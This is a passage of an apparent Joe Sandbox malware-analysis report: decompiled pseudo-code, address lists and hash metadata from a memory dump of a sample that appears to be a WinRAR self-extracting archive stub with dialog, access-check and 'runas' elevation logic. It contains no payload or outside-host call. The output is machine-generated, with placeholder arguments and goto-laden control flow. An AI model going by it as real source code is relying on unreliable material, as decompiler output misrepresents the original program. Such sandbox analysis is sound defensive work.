												 *((char*)(_t280 + 0x2c)) = 0;
												_t252 =  *(_t292 + 0x24);
												goto L18;
											}
											break;
										}
										L33:
										_t232 =  *(_t292 + 0x28);
										_t275 = _t232 /  *(_t223 + 0x1c);
										_t179 = _t232;
										__eflags = _t179 %  *(_t223 + 0x1c);
										if(_t179 %  *(_t223 + 0x1c) != 0) {
											_t275 = _t275 + 1;
											__eflags = _t275;
										}
										_t283 = 0;
										__eflags = _t232;
										if(_t232 != 0) {
											_t269 =  *((intOrPtr*)(_t292 + 0x14));
											_t257 = 0;
											_t202 = _t275 * 0x4ae4;
											__eflags = _t202;
											 *((intOrPtr*)(_t292 + 0x20)) = 0;
											 *(_t292 + 0x38) = _t202;
											_t203 = _t292 + 0x40;
											do {
												_t258 = _t257 +  *_t269;
												_t244 = _t203;
												 *((intOrPtr*)(_t292 + 0x3c)) = _t203 + 8;
												_t206 =  *(_t292 + 0x28) - _t283;
												 *_t244 = _t257 +  *_t269;
												__eflags = _t275 - _t206;
												if(_t275 < _t206) {
													_t206 = _t275;
												}
												__eflags =  *(_t292 + 0x24) - 1;
												 *(_t244 + 4) = _t206;
												if( *(_t292 + 0x24) != 1) {
													E00C70F86( *((intOrPtr*)(_t223 + 0x14)), E00C777C0, _t244);
												} else {
													E00C77153(_t223, _t258);
												}
												_t283 = _t283 + _t275;
												_t257 =  *((intOrPtr*)(_t292 + 0x20)) +  *(_t292 + 0x38);
												_t203 =  *((intOrPtr*)(_t292 + 0x3c));
												 *((intOrPtr*)(_t292 + 0x20)) = _t257;
												__eflags = _t283 -  *(_t292 + 0x28);
											} while (_t283 <  *(_t292 + 0x28));
											_t265 =  *(_t292 + 0x2c);
										}
										_t284 =  *(_t292 + 0x24);
										__eflags = _t284;
										if(_t284 == 0) {
											_t272 =  *((intOrPtr*)(_t292 + 0x1c));
											goto L68;
										} else {
											E00C711CF( *((intOrPtr*)(_t223 + 0x14)));
											_t276 = 0;
											__eflags = _t284;
											if(_t284 == 0) {
												L55:
												__eflags =  *((char*)(_t292 + 0x13));
												if( *((char*)(_t292 + 0x13)) == 0) {
													_t182 =  *((intOrPtr*)(_t292 + 0x1c));
													_t278 = _t265 - _t182;
													__eflags = _t278 - 0x400;
													if(_t278 < 0x400) {
														__eflags = _t278;
														if(__eflags >= 0) {
															if(__eflags > 0) {
																__eflags = _t182 +  *((intOrPtr*)(_t223 + 0x20));
																E00C80320( *((intOrPtr*)(_t223 + 0x20)), _t182 +  *((intOrPtr*)(_t223 + 0x20)), _t278);
																_t292 = _t292 + 0xc;
															}
															_t282 =  *((intOrPtr*)(_t292 + 0x14));
															_t265 = _t278;
															goto L6;
														}
													} else {
														_t282 =  *((intOrPtr*)(_t292 + 0x14));
														_t272 = _t182;
														__eflags = _t272 - _t265;
														if(_t272 >= _t265) {
															goto L7;
														} else {
															_t252 = 0;
															 *(_t292 + 0x28) =  *(_t292 + 0x28) & 0;
															 *(_t292 + 0x24) = 0;
															_t176 =  *(_t223 + 0x1c) +  *(_t223 + 0x1c);
															if(_t176 != 0) {
															}
															goto L33;
														}
													}
												}
											} else {
												_t185 = 0;
												__eflags = 0;
												 *((intOrPtr*)(_t292 + 0x20)) = 0;
												do {
													_t289 =  *((intOrPtr*)( *((intOrPtr*)(_t292 + 0x14)))) + _t185;
													__eflags =  *((char*)(_t289 + 0x4ad1));
													if( *((char*)(_t289 + 0x4ad1)) != 0) {
														L50:
														_t186 = E00C777EF(_t223, _t289);
														__eflags = _t186;
														if(_t186 != 0) {
															goto L51;
														}
													} else {
														_t201 = E00C7390D(_t223, _t289);
														__eflags = _t201;
														if(_t201 != 0) {
															__eflags =  *((char*)(_t289 + 0x4ad1));
															if( *((char*)(_t289 + 0x4ad1)) == 0) {
																L51:
																__eflags =  *((char*)(_t289 + 0x4ad0));
																if( *((char*)(_t289 + 0x4ad0)) == 0) {
																	__eflags =  *((char*)(_t289 + 0x4ad3));
																	if( *((char*)(_t289 + 0x4ad3)) != 0) {
																		_t241 =  *((intOrPtr*)(_t223 + 0x20));
																		_t189 =  *((intOrPtr*)(_t289 + 0x10)) -  *((intOrPtr*)(_t223 + 0x20)) +  *(_t289 + 4);
																		__eflags = _t265 - _t189;
																		if(_t265 > _t189) {
																			_t265 = _t265 - _t189;
																			 *(_t292 + 0x38) = _t265;
																			E00C80320(_t241, _t189 + _t241, _t265);
																			_t292 = _t292 + 0xc;
																			 *((intOrPtr*)(_t289 + 0x18)) =  *((intOrPtr*)(_t289 + 0x18)) +  *(_t289 + 0x20) -  *(_t289 + 4);
																			 *(_t289 + 0x24) =  *(_t289 + 0x24) & 0x00000000;
																			 *(_t289 + 0x20) =  *(_t289 + 0x20) & 0x00000000;
																			 *(_t289 + 4) =  *(_t289 + 4) & 0x00000000;
																			 *((intOrPtr*)(_t289 + 0x10)) =  *((intOrPtr*)(_t223 + 0x20));
																			__eflags = _t276;
																			if(_t276 != 0) {
																				_t196 =  *((intOrPtr*)( *((intOrPtr*)(_t292 + 0x14))));
																				E00C80320(_t196, _t289, 0x4ae4);
																				_t242 =  *((intOrPtr*)(_t292 + 0x20));
																				_t292 = _t292 + 0xc;
																				 *((intOrPtr*)( *_t242 + 0x4ad4)) =  *((intOrPtr*)(_t196 + 0x4ad4));
																				 *((intOrPtr*)( *_t242 + 0x4adc)) =  *((intOrPtr*)(_t196 + 0x4adc));
																				_t265 =  *(_t292 + 0x2c);
																				 *((char*)(_t289 + 0x4ad3)) = 0;
																			}
																			_t272 = 0;
																			 *((intOrPtr*)(_t292 + 0x1c)) = 0;
																			L68:
																			_t282 =  *((intOrPtr*)(_t292 + 0x14));
																			goto L69;
																		}
																	} else {
																		__eflags =  *((char*)(_t289 + 0x28));
																		if( *((char*)(_t289 + 0x28)) == 0) {
																			goto L54;
																		}
																	}
																}
															} else {
																goto L50;
															}
														}
													}
													goto L70;
													L54:
													_t276 = _t276 + 1;
													_t185 =  *((intOrPtr*)(_t292 + 0x20)) + 0x4ae4;
													 *((intOrPtr*)(_t292 + 0x20)) = _t185;
													__eflags = _t276 -  *(_t292 + 0x24);
												} while (_t276 <  *(_t292 + 0x24));
												goto L55;
											}
										}
										goto L70;
									}
								}
							} else {
								L69:
								__eflags =  *((char*)(_t292 + 0x13));
								if( *((char*)(_t292 + 0x13)) == 0) {
									continue;
								}
							}
						}
						break;
					}
					L70:
					 *(_t223 + 0x7c) =  *(_t223 + 0x7c) &  *(_t223 + 0xe6dc);
					E00C75202(_t223);
					_t250 =  *(_t292 + 0x30) * 0x4ae4;
					_t230 = 5;
					_t170 =  *((intOrPtr*)( *((intOrPtr*)(_t292 + 0x14))));
					__eflags = _t170 + _t250 + 0x30;
					return E00C80320(memcpy(_t223 + 0x8c, _t250 + 0x18 + _t170, _t230 << 2), _t170 + _t250 + 0x30, 0x4a9c);
				}
			}

0x00c76ce6
0x00c76ce8
0x00c76cf6
0x00c76cfe
0x00c76d01
0x00c76d03
0x00c76d09
0x00c76d2c
0x00c76d0b
0x00c76d0b
0x00c76d0d
0x00c76d0d
0x00c76d10
0x00c76d16
0x00c76d17
0x00c76d1c
0x00c76d26
0x00c76d2a
0x00c76d3b
0x00c76d4b
0x00c76d54
0x00c76d5b
0x00c76d5e
0x00c76d62
0x00c76d64
0x00c76d68
0x00c76d6c
0x00c76d6c
0x00c76d6c
0x00c76d6e
0x00c76d72
0x00c76d72
0x00c76d7e
0x00c76d84
0x00c76d85
0x00c76d8a
0x00c76d90
0x00000000
0x00000000
0x00c76d96
0x00c76d98
0x00c76d9c
0x00c76da4
0x00c76db4
0x00000000
0x00000000
0x00c76dba
0x00c76dbd
0x00c76dbf
0x00c76dc3
0x00c76dc7
0x00c76dc9
0x00c76dc9
0x00c76dcf
0x00c76dcf
0x00c76dd1
0x00c76dd5
0x00c76dd8
0x00c76dda
0x00c76de5
0x00c76de5
0x00c76de8
0x00c76dea
0x00000000
0x00000000
0x00c76dec
0x00c76dec
0x00c76e2d
0x00c76e32
0x00c76e32
0x00c76e35
0x00c76e3f
0x00c76e49
0x00c76e4f
0x00c76e80
0x00c76e85
0x00c76e96
0x00c76e9d
0x00c76e90
0x00c76e90
0x00c76e90
0x00c76eb0
0x00c76eb2
0x00c76eb3
0x00c76eb7
0x00c76ebd
0x00c76ec3
0x00c76ec7
0x00c76ec9
0x00c76ed6
0x00c76edb
0x00c76edf
0x00c76ee1
0x00c76dd8
0x00c76dda
0x00c76de5
0x00c76de5
0x00c76de8
0x00c76dea
0x00000000
0x00000000
0x00c76dea
0x00c76edf
0x00c76ed6
0x00c76e51
0x00c76e51
0x00c76e52
0x00c76e55
0x00c76e60
0x00c76eea
0x00c76e75
0x00c76e75
0x00c76e79
0x00000000
0x00c76e79
0x00c76e60
0x00000000
0x00c76df4
0x00c76dfc
0x00c76e03
0x00c76e03
0x00c76e08
0x00c76e0b
0x00c76e0b
0x00c76e0f
0x00c76e11
0x00c76e17
0x00c76e1d
0x00c76e23
0x00c76e26
0x00c76e29
0x00000000
0x00c76e29
0x00000000
0x00c76e17
0x00c76eef
0x00c76eef
0x00c76efc
0x00c76efe
0x00c76f03
0x00c76f05
0x00c76f07
0x00c76f07
0x00c76f07
0x00c76f08
0x00c76f0a
0x00c76f0c
0x00c76f0e
0x00c76f12
0x00c76f14
0x00c76f14
0x00c76f1a
0x00c76f1e
0x00c76f22
0x00c76f26
0x00c76f26
0x00c76f28
0x00c76f2d
0x00c76f35
0x00c76f37
0x00c76f39
0x00c76f3b
0x00c76f3d
0x00c76f3d
0x00c76f3f
0x00c76f44
0x00c76f47
0x00c76f5c
0x00c76f49
0x00c76f4c
0x00c76f4c
0x00c76f65
0x00c76f67
0x00c76f6b
0x00c76f6f
0x00c76f73
0x00c76f73
0x00c76f79
0x00c76f79
0x00c76f7d
0x00c76f81
0x00c76f83
0x00c770eb
0x00000000
0x00c76f89
0x00c76f8c
0x00c76f91
0x00c76f93
0x00c76f95
0x00c7700b
0x00c7700b
0x00c77010
0x00c77016
0x00c7701c
0x00c7701e
0x00c77024
0x00c770ca
0x00c770cc
0x00c770ce
0x00c770d3
0x00c770d8
0x00c770dd
0x00c770dd
0x00c770e0
0x00c770e4
0x00000000
0x00c770e4
0x00c7702a
0x00c7702a
0x00c7702e
0x00c77030
0x00c77032
0x00000000
0x00c77038
0x00c76dbd
0x00c76dbf
0x00c76dc3
0x00c76dc7
0x00c76dc9
0x00c76dc9
0x00000000
0x00c76dc9
0x00c77032
0x00c77024
0x00c76f97
0x00c76f97
0x00c76f97
0x00c76f99
0x00c76f9d
0x00c76fa3
0x00c76fa5
0x00c76fac
0x00c76fc7
0x00c76fca
0x00c76fcf
0x00c76fd1
0x00000000
0x00000000
0x00c76fae
0x00c76fb1
0x00c76fb6
0x00c76fb8
0x00c76fbe
0x00c76fc5
0x00c76fd7
0x00c76fd7
0x00c76fde
0x00c76fe4
0x00c76feb
0x00c77040
0x00c77045
0x00c77048
0x00c7704a
0x00c77050
0x00c77057
0x00c7705b
0x00c77063
0x00c77069
0x00c7706c
0x00c77070
0x00c77077
0x00c7707b
0x00c7707e
0x00c77080
0x00c7708c
0x00c7709b
0x00c770a0
0x00c770a4
0x00c770a9
0x00c770b1
0x00c770b7
0x00c770bb
0x00c770bb
0x00c770c2
0x00c770c4
0x00c770ef
0x00c770ef
0x00000000
0x00c770ef
0x00c76fed
0x00c76fed
0x00c76ff1
0x00000000
0x00000000
0x00c76ff1
0x00c76feb
0x00000000
0x00000000
0x00000000
0x00c76fc5
0x00c76fb8
0x00000000
0x00c76ff7
0x00c76ffb
0x00c76ffc
0x00c77001
0x00c77005
0x00c77005
0x00000000
0x00c76f9d
0x00c76f95
0x00000000
0x00c76f83
0x00c76dba
0x00c770f3
0x00c770f3
0x00c770f3
0x00c770f8
0x00000000
0x00000000
0x00c770f8
0x00c76da4
0x00000000
0x00c76d9c
0x00c770fe
0x00c77106
0x00c77109
0x00c7710e
0x00c77122
0x00c77128
0x00c77132
0x00c77150
0x00c77150

Memory Dump Source

Source File: 00000000.00000002.251878309.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.251871095.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.251992058.0000000000C93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252005081.0000000000C9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252011466.0000000000CA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252019999.0000000000CC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252027714.0000000000CC3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252037084.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_primosdv3.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 087a88c208418e59aaf85483e299c7956023f6a1fce2285fe7b08b95b555cf96
Instruction ID: 72d51ed39aab31622657ca9f576a5978bb41a5173245f1768ce88c0a52471a7e
Opcode Fuzzy Hash: 087a88c208418e59aaf85483e299c7956023f6a1fce2285fe7b08b95b555cf96
Instruction Fuzzy Hash: 63D1E7716087448FDB24DF28C98475BBBE1BF89308F08856DE89D9B342D774EA05CB56

Uniqueness

Uniqueness Score: -1.00%

Function 00C7B7E0 Relevance: 102.2, APIs: 48, Strings: 10, Instructions: 731
windowfilesleepCOMMON

Download Yara Rule

C-Code - Quality: 77%

			E00C7B7E0(void* __ecx, void* __edx, void* __eflags, void* __fp0) {
				void* __ebx;
				void* __edi;
				void* _t105;
				int _t106;
				long _t108;
				long _t109;
				struct HWND__* _t110;
				struct HWND__* _t114;
				void* _t117;
				void* _t118;
				void* _t135;
				void* _t139;
				signed int _t152;
				struct HWND__* _t155;
				void* _t173;
				int _t186;
				signed int _t201;
				void* _t202;
				long _t210;
				void* _t220;
				void* _t234;
				signed int _t244;
				void* _t245;
				void* _t260;
				long _t262;
				long _t263;
				long _t264;
				int _t278;
				int _t280;
				void* _t285;
				void* _t289;
				int _t293;
				void* _t296;
				WCHAR* _t298;
				intOrPtr _t299;
				intOrPtr _t300;
				struct HWND__* _t311;
				intOrPtr _t314;
				void* _t316;
				struct HWND__* _t317;
				void* _t318;
				struct HWND__* _t320;
				long _t321;
				struct HWND__* _t322;
				intOrPtr _t323;
				void* _t325;
				void* _t327;
				void* _t328;
				void* _t330;

				_t309 = __edx;
				_t296 = __ecx;
				E00C7EB78(0xc92b04, _t328);
				E00C7EC50(0xfe80);
				_t314 =  *((intOrPtr*)(_t328 + 0xc));
				_t311 =  *(_t328 + 8);
				_t105 = E00C61316(__edx, _t311, _t314,  *(_t328 + 0x10),  *((intOrPtr*)(_t328 + 0x14)), L"STARTDLG", 0, 0);
				_t293 = 1;
				if(_t105 != 0) {
					L128:
					_t106 = _t293;
					L129:
					 *[fs:0x0] =  *((intOrPtr*)(_t328 - 0xc));
					return _t106;
				}
				_t316 = _t314 - 0x110;
				if(_t316 == 0) {
					_push(_t311);
					E00C7D69E(_t296, __edx, __eflags, __fp0);
					_t108 =  *0xcb7b7c;
					 *0xca8450 = _t311;
					 *0xca8458 = _t311;
					__eflags = _t108;
					if(_t108 != 0) {
						SendMessageW(_t311, 0x80, 1, _t108); // executed
					}
					_t109 =  *0xcbec84;
					__eflags = _t109;
					if(_t109 != 0) {
						SendDlgItemMessageW(_t311, 0x6c, 0x172, 0, _t109); // executed
					}
					_t110 = GetDlgItem(_t311, 0x68);
					 *(_t328 - 0x14) = _t110;
					SendMessageW(_t110, 0x435, 0, 0x400000);
					E00C7A64D(_t328 - 0x3474, 0x800);
					_t114 = GetDlgItem(_t311, 0x66);
					__eflags =  *0xcaa472;
					_t317 = _t114;
					 *(_t328 - 0x18) = _t317;
					_t298 = 0xcaa472;
					if( *0xcaa472 == 0) {
						_t298 = _t328 - 0x3474;
					}
					SetWindowTextW(_t317, _t298);
					E00C7ABAB(_t317); // executed
					_push(0xcbfca0);
					_push(0xcbfc90);
					_push(0xcbec90);
					_push(_t311);
					 *0xca8463 = 0; // executed
					_t117 = E00C7B093(_t298, _t309, __eflags); // executed
					__eflags = _t117;
					if(_t117 == 0) {
						 *0xca8456 = _t293;
					}
					__eflags =  *0xcbfca0;
					if( *0xcbfca0 > 0) {
						_push(7);
						_push( *0xcbfc90);
						_push(_t311);
						E00C7C73F(_t309, _t311);
					}
					__eflags =  *0xcac577;
					if( *0xcac577 == 0) {
						SetDlgItemTextW(_t311, 0x6b, E00C6E617(0xbf));
						SetDlgItemTextW(_t311, _t293, E00C6E617(0xbe));
					}
					__eflags =  *0xcbfca0;
					if( *0xcbfca0 <= 0) {
						L104:
						__eflags =  *0xca8463;
						if( *0xca8463 != 0) {
							L116:
							__eflags =  *0xcaa46c - 2;
							if( *0xcaa46c == 2) {
								EnableWindow(_t317, 0);
							}
							__eflags =  *0xca9468;
							if( *0xca9468 != 0) {
								E00C612D3(_t311, 0x67, 0);
								E00C612D3(_t311, 0x66, 0);
							}
							_t118 =  *0xcaa46c;
							__eflags = _t118;
							if(_t118 != 0) {
								__eflags =  *0xca8454;
								if( *0xca8454 == 0) {
									_push(0);
									_push(_t293);
									_push(0x111);
									_push(_t311);
									__eflags = _t118 - _t293;
									if(_t118 != _t293) {
										 *0xcc30a0();
									} else {
										SendMessageW(); // executed
									}
								}
							}
							__eflags =  *0xca8456;
							if( *0xca8456 != 0) {
								_push(E00C6E617(0x90));
								_push(_t293);
								L127:
								SetDlgItemTextW(_t311, ??, ??);
							}
							goto L128;
						}
						__eflags =  *0xcbfc94;
						if( *0xcbfc94 != 0) {
							goto L116;
						}
						__eflags =  *0xcaa46c;
						if( *0xcaa46c != 0) {
							goto L116;
						}
						__eflags = 0;
						_t318 = 0xaa;
						 *((short*)(_t328 - 0x7874)) = 0;
						goto L108;
						do {
							while(1) {
								L108:
								__eflags = _t318 - 0xaa;
								if(_t318 != 0xaa) {
									goto L110;
								}
								__eflags =  *0xcac577;
								if( *0xcac577 == 0) {
									break;
								}
								L110:
								__eflags = _t318 - 0xab;
								if(__eflags != 0) {
									L113:
									E00C705DA(__eflags, _t328 - 0x7874, " ", 0x2000);
									E00C705DA(__eflags, _t328 - 0x7874, E00C6E617(_t318), 0x2000);
									break;
								}
								__eflags =  *0xcac577;
								if(__eflags == 0) {
									goto L113;
								}
								_t318 = _t318 + 1;
							}
							_t318 = _t318 + 1;
							__eflags = _t318 - 0xb0;
						} while (__eflags <= 0);
						_t299 =  *0xca8440; // 0x0
						E00C79ED5(_t299, __eflags,  *0xca102c,  *(_t328 - 0x14), _t328 - 0x7874, 0, 0);
						_t317 =  *(_t328 - 0x18);
						goto L116;
					} else {
						_push(0);
						_push( *0xcbfc90);
						_push(_t311); // executed
						E00C7C73F(_t309, _t311); // executed
						_t135 =  *0xcbfc94;
						__eflags = _t135;
						if(_t135 != 0) {
							__eflags =  *0xcaa46c;
							if(__eflags == 0) {
								_t300 =  *0xca8440; // 0x0
								E00C79ED5(_t300, __eflags,  *0xca102c,  *(_t328 - 0x14), _t135, 0, 0);
								L00C83E2E( *0xcbfc94);
							}
						}
						__eflags =  *0xcaa46c - _t293;
						if( *0xcaa46c == _t293) {
							L103:
							_push(_t293);
							_push( *0xcbfc90);
							_push(_t311);
							E00C7C73F(_t309, _t311);
							goto L104;
						} else {
							 *0xcc30c0(_t311);
							__eflags =  *0xcaa46c - _t293;
							if( *0xcaa46c == _t293) {
								goto L103;
							}
							__eflags =  *0xcaa471;
							if( *0xcaa471 != 0) {
								goto L103;
							}
							_push(3);
							_push( *0xcbfc90);
							_push(_t311);
							E00C7C73F(_t309, _t311);
							__eflags =  *0xcbfc98;
							if( *0xcbfc98 == 0) {
								goto L103;
							}
							_t139 = DialogBoxParamW( *0xca102c, L"LICENSEDLG", 0, E00C7B5C0, 0);
							__eflags = _t139;
							if(_t139 == 0) {
								L23:
								 *0xca8454 = _t293;
								L24:
								_push(_t293);
								L25:
								 *0xcc30b0(_t311); // executed
								goto L128;
							}
							goto L103;
						}
					}
				}
				if(_t316 != 1) {
					L6:
					_t106 = 0;
					goto L129;
				}
				_t152 = ( *(_t328 + 0x10) & 0x0000ffff) - 1;
				if(_t152 == 0) {
					__eflags =  *0xca8455;
					if( *0xca8455 != 0) {
						L21:
						GetDlgItemTextW(_t311, 0x66, _t328 - 0x2474, 0x800);
						__eflags =  *0xca8455;
						if( *0xca8455 == 0) {
							__eflags =  *0xca8456;
							if( *0xca8456 == 0) {
								_t155 = GetDlgItem(_t311, 0x68);
								__eflags =  *0xca845c;
								_t320 = _t155;
								if( *0xca845c == 0) {
									SendMessageW(_t320, 0xb1, 0, 0xffffffff);
									SendMessageW(_t320, 0xc2, 0, 0xc935f4);
								}
								SetFocus(_t320);
								__eflags =  *0xca9468;
								if( *0xca9468 == 0) {
									_t321 = 0x800;
									E00C70602(_t328 - 0x1474, _t328 - 0x2474, 0x800);
									E00C7D453(_t296, _t328 - 0x1474, 0x800);
									E00C64092(_t328 - 0x4974, 0x880, E00C6E617(0xb9), _t328 - 0x1474);
									_t330 = _t330 + 0x10;
									_push(_t328 - 0x4974);
									_push(0);
									E00C7D4D4();
								} else {
									_push(E00C6E617(0xba));
									_push(0);
									E00C7D4D4();
									_t321 = 0x800;
								}
								__eflags =  *0xcaa471;
								if( *0xcaa471 == 0) {
									E00C7DB4B(_t328 - 0x2474);
								}
								 *(_t328 - 0xd) = 0;
								E00C6A0B1(_t293, _t296, _t311, _t328, _t328 - 0x2474, 0, 0);
								__eflags = 0;
								if(0 != 0) {
									L39:
									_t302 = E00C7AC04(_t328 - 0x2474);
									 *((char*)(_t328 - 0xe)) = _t302;
									__eflags = _t302;
									if(_t302 == 0) {
										_t263 = GetLastError();
										_t302 =  *((intOrPtr*)(_t328 - 0xe));
										__eflags = _t263 - 5;
										if(_t263 == 5) {
											 *(_t328 - 0xd) = _t293;
										}
									}
									_t173 =  *0xcaa471;
									__eflags = _t173;
									if(_t173 != 0) {
										L48:
										__eflags =  *((char*)(_t328 - 0xe));
										if( *((char*)(_t328 - 0xe)) != 0) {
											 *0xca844c = _t293;
											E00C612F1(_t311, 0x67, 0);
											E00C612F1(_t311, 0x66, 0);
											SetDlgItemTextW(_t311, _t293, E00C6E617(0xe6)); // executed
											E00C612F1(_t311, 0x69, _t293);
											SetDlgItemTextW(_t311, 0x65, 0xc935f4); // executed
											_t322 = GetDlgItem(_t311, 0x65);
											__eflags = _t322;
											if(_t322 != 0) {
												_t210 = GetWindowLongW(_t322, 0xfffffff0) | 0x00000080;
												__eflags = _t210;
												SetWindowLongW(_t322, 0xfffffff0, _t210);
											}
											_push(5);
											_push( *0xcbfc90);
											_push(_t311);
											E00C7C73F(_t309, _t311);
											_push(2);
											_push( *0xcbfc90);
											_push(_t311);
											E00C7C73F(_t309, _t311);
											_push(0xcbec90);
											_push(_t311);
											 *0xcc1cbc = _t293; // executed
											E00C7DA52(_t302, _t309, __eflags); // executed
											_push(6);
											_push( *0xcbfc90);
											 *0xcc1cbc = 0;
											_push(_t311);
											E00C7C73F(_t309, _t311);
											__eflags =  *0xca8454;
											if( *0xca8454 == 0) {
												__eflags =  *0xca845c;
												if( *0xca845c == 0) {
													__eflags =  *0xcbfcac;
													if( *0xcbfcac == 0) {
														_push(4);
														_push( *0xcbfc90);
														_push(_t311); // executed
														E00C7C73F(_t309, _t311); // executed
													}
												}
											}
											E00C612D3(_t311, _t293, _t293);
											 *0xca844c =  *0xca844c & 0x00000000;
											__eflags =  *0xca844c;
											_t186 =  *0xca8454; // 0x1
											goto L73;
										}
										__eflags = _t173;
										if(_t173 != 0) {
											goto L65;
										}
										goto L50;
									} else {
										__eflags = _t302;
										if(_t302 == 0) {
											L50:
											_t220 =  *(_t328 - 0xd);
											__eflags = _t220;
											 *(_t328 - 0xd) = _t220 == 0;
											__eflags = _t220;
											if(_t220 == 0) {
												L64:
												__eflags =  *(_t328 - 0xd);
												if( *(_t328 - 0xd) == 0) {
													L11:
													_push(0);
													goto L25;
												}
												L65:
												_push(E00C6E617(0x9a));
												E00C64092(_t328 - 0x3874, 0xa00, L"\"%s\"\n%s", _t328 - 0x2474);
												E00C66D83(0xca1098, _t293);
												E00C7A7E4(_t311, _t328 - 0x3874, E00C6E617(0x96), 0x30);
												 *0xca845c =  *0xca845c + 1;
												goto L11;
											}
											GetModuleFileNameW(0, _t328 - 0x3474, _t321);
											E00C6F28C(0xcac472, _t328 - 0x574, 0x80);
											_push(0xcab472);
											E00C64092(_t328 - 0xfe8c, 0x430c, L"-el -s2 \"-d%s\" \"-sp%s\"", _t328 - 0x2474);
											_t330 = _t330 + 0x14;
											 *(_t328 - 0x58) = 0x3c;
											 *((intOrPtr*)(_t328 - 0x54)) = 0x40;
											 *((intOrPtr*)(_t328 - 0x48)) = _t328 - 0x3474;
											 *((intOrPtr*)(_t328 - 0x44)) = _t328 - 0xfe8c;
											 *(_t328 - 0x50) = _t311;
											 *((intOrPtr*)(_t328 - 0x4c)) = L"runas";
											 *(_t328 - 0x3c) = _t293;
											 *((intOrPtr*)(_t328 - 0x38)) = 0;
											 *((intOrPtr*)(_t328 - 0x40)) = 0xca8468;
											_t325 = CreateFileMappingW(0xffffffff, 0, 0x8000004, 0, 0x7104, L"winrarsfxmappingfile.tmp");
											 *(_t328 - 0x14) = _t325;
											__eflags = _t325;
											if(_t325 == 0) {
												 *(_t328 - 0x1c) =  *(_t328 - 0x14);
											} else {
												 *0xcb7b80 = 0;
												_t245 = GetCommandLineW();
												__eflags = _t245;
												if(_t245 != 0) {
													E00C70602(0xcb7b82, _t245, 0x2000);
												}
												E00C7B425(0xcac472, 0xcbbb82, 7);
												E00C7B425(0xcac472, 0xcbcb82, 2);
												E00C7B425(0xcac472, 0xcbdb82, 0x10);
												 *0xcbec83 = _t293;
												E00C6F3FA(_t293, 0xcbeb82, _t328 - 0x574);
												 *(_t328 - 0x1c) = MapViewOfFile(_t325, 2, 0, 0, 0);
												E00C80320(_t252, 0xcb7b80, 0x7104);
												_t330 = _t330 + 0xc;
											}
											_t234 = ShellExecuteExW(_t328 - 0x58);
											E00C6F445(_t328 - 0x574, 0x80);
											E00C6F445(_t328 - 0xfe8c, 0x430c);
											__eflags = _t234;
											if(_t234 == 0) {
												_t327 =  *(_t328 - 0x1c);
												 *(_t328 - 0xd) = _t293;
												goto L62;
											} else {
												 *0xcc30a4( *(_t328 - 0x20), 0x2710);
												_t67 = _t328 - 0x18;
												 *_t67 =  *(_t328 - 0x18) & 0x00000000;
												__eflags =  *_t67;
												_t327 =  *(_t328 - 0x1c);
												while(1) {
													__eflags =  *_t327;
													if( *_t327 != 0) {
														break;
													}
													Sleep(0x64);
													_t244 =  *(_t328 - 0x18) + 1;
													 *(_t328 - 0x18) = _t244;
													__eflags = _t244 - 0x64;
													if(_t244 < 0x64) {
														continue;
													}
													break;
												}
												 *0xcbfcac =  *(_t328 - 0x20);
												L62:
												__eflags =  *(_t328 - 0x14);
												if( *(_t328 - 0x14) != 0) {
													UnmapViewOfFile(_t327);
													CloseHandle( *(_t328 - 0x14));
												}
												goto L64;
											}
										}
										E00C64092(_t328 - 0x1474, _t321, L"__tmp_rar_sfx_access_check_%u", GetTickCount());
										_t330 = _t330 + 0x10;
										E00C69556(_t328 - 0x34ac);
										 *(_t328 - 4) =  *(_t328 - 4) & 0x00000000;
										_t260 = E00C6966E(_t328 - 0x34ac, _t328 - 0x1474, 0x11);
										 *((char*)(_t328 - 0xe)) = _t260;
										__eflags = _t260;
										if(_t260 == 0) {
											_t262 = GetLastError();
											__eflags = _t262 - 5;
											if(_t262 == 5) {
												 *(_t328 - 0xd) = _t293;
											}
										}
										_t37 = _t328 - 4;
										 *_t37 =  *(_t328 - 4) | 0xffffffff;
										__eflags =  *_t37;
										_t302 = _t328 - 0x34ac;
										E00C6959A(_t328 - 0x34ac); // executed
										_t173 =  *0xcaa471;
										goto L48;
									}
								} else {
									_t264 = GetLastError();
									__eflags = _t264 - 5;
									if(_t264 == 5) {
										L38:
										 *(_t328 - 0xd) = _t293;
										goto L39;
									}
									__eflags = _t264 - 3;
									if(_t264 != 3) {
										goto L39;
									}
									goto L38;
								}
							} else {
								_t186 = _t293;
								 *0xca8454 = _t186;
								L73:
								__eflags =  *0xca845c;
								if( *0xca845c <= 0) {
									goto L24;
								}
								__eflags = _t186;
								if(_t186 != 0) {
									goto L24;
								}
								 *0xca8455 = _t293;
								SetDlgItemTextW(_t311, _t293, E00C6E617(0x90));
								_t323 =  *0xca1098;
								__eflags = _t323 - 9;
								if(_t323 != 9) {
									__eflags = _t323 - 3;
									_t193 = ((_t323 != 0x00000003) - 0x00000001 & 0x0000000b) + 0x97;
									__eflags = ((_t323 != 0x00000003) - 0x00000001 & 0x0000000b) + 0x97;
								} else {
									_t193 = 0xa0;
								}
								E00C70602(_t328 - 0x474, E00C6E617(_t193), 0x200);
								__eflags = _t323 - 9;
								if(_t323 == 9) {
									__eflags =  *0xcac574;
									if( *0xcac574 != 0) {
										_t201 = E00C83E13(_t328 - 0x474);
										_t202 = E00C6E617(0xa1);
										__eflags = 0x200;
										E00C64092(_t328 - 0x474 + _t201 * 2, 0x200 - _t201, L"\n%s", _t202);
									}
								}
								E00C7A7E4(_t311, _t328 - 0x474, E00C6E617(0x96), 0x30);
								goto L128;
							}
						}
						_t293 = 1;
						__eflags =  *0xca8456;
						if( *0xca8456 == 0) {
							goto L24;
						}
						goto L23;
					}
					__eflags =  *0xcc1cbc;
					if( *0xcc1cbc == 0) {
						goto L21;
					} else {
						__eflags =  *0xcc1cbd;
